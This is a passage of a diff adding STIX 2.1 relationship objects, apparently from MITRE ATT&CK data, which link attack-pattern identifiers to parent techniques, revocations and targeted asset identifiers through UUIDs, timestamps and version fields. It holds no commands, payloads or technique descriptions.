"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e73f2fb1-3ae4-4b06-a441-c3325bc5e80c", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e74c08f1-7dc7-4641-9586-fda024be0069", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e74c2729-0777-4488-a890-121e7abe5fc2", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e74f5c25-83c7-4b6b-84b0-6ae829f183aa", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e75f88e6-1ffb-467b-b488-46e91cb3e1e9", + "created": "2023-09-28T19:42:16.270Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:42:16.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e77339ac-6847-43c7-b707-de8c80af1f34", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e79825fb-3bd0-41e7-9bdd-257cd3ab44a2", + "created": "2023-09-29T16:45:20.769Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:45:20.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e79d859d-49fe-45e1-97c0-1ac3de62a905", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e79f474b-b681-45c6-822f-8d30746c6e42", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e7a4c985-2dc5-4344-b612-2e019f61289c", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e7abc5ca-ca57-459a-b422-331f3f4d4506", + "created": "2020-01-13T15:48:56.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", + "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e7c8615b-2dd4-42a9-9535-2deed30ea8d7", + "created": "2019-11-27T14:31:56.861Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e7d45527-e11e-4e42-8b7b-baba9b2c7af6", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e7ea911e-debb-4e88-918d-faececdd004d", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8081985-6080-4932-b5ef-7c9d21107a15", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e83a79df-2555-4b2f-9ade-b9ed2689ae42", + "created": "2023-09-29T16:39:41.736Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:39:41.736Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e86a7f88-d487-4cf7-863e-23fb7709c541", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e87d4f08-52ed-419e-b47a-54cea95316ae", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8805439-acf9-4878-aaee-31013f12877f", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8872332-8ac0-424e-a6e8-d97dd4e252fb", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e899563a-068f-49a8-8d63-79b526bb646a", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8b07bb0-a0d3-49b2-a6c4-f546c50cdb64", + "created": "2020-01-31T18:59:22.084Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--8df54627-376c-487c-a09c-7d2b5620f56e", + "target_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8b1383c-0df6-4795-b89a-2e0a44c25e8b", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8c7a24d-8d8a-4a87-98c9-681cce147ed9", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8dd9d1d-cf4a-4da4-a9e6-afb681e7e150", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8eb08f3-6c0e-42e3-ade3-1ea1aac85032", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8ef9bb9-1335-4418-b788-f8220dbbe4c8", + "created": "2023-09-28T19:50:30.312Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:50:30.312Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e8f1b313-310f-4f63-a950-5db9defb236b", + "created": "2024-06-26T13:49:26.922Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:49:26.922Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e9016600-0463-439f-a5f5-0ad982e1479c", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e915e12c-3d0c-4f60-b119-9414940abb0b", + "created": "2023-09-28T20:08:27.145Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:08:27.145Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e923fe9c-ccae-4d5a-a85c-89b398ee1ed5", + "created": "2024-02-06T16:20:42.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-02-06T16:20:42.323Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", + "target_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e92c4fd7-eb92-4255-80c3-abaa9262845f", + "created": "2020-02-12T18:57:36.126Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e932d884-01fb-4e76-abbc-8b4b5179026c", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e9373552-7d37-4c7c-b28b-426324a9c9ef", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e93bb1fe-9cbf-492b-bd53-c0915a722123", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e95959e9-fdd9-4c69-acd0-889963378057", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e95fe824-4df1-49a2-abf7-5d76fb47ef42", + "created": "2023-09-28T19:45:18.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:45:18.672Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e97772ea-43d3-4f37-af88-396ea1a6d464", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": 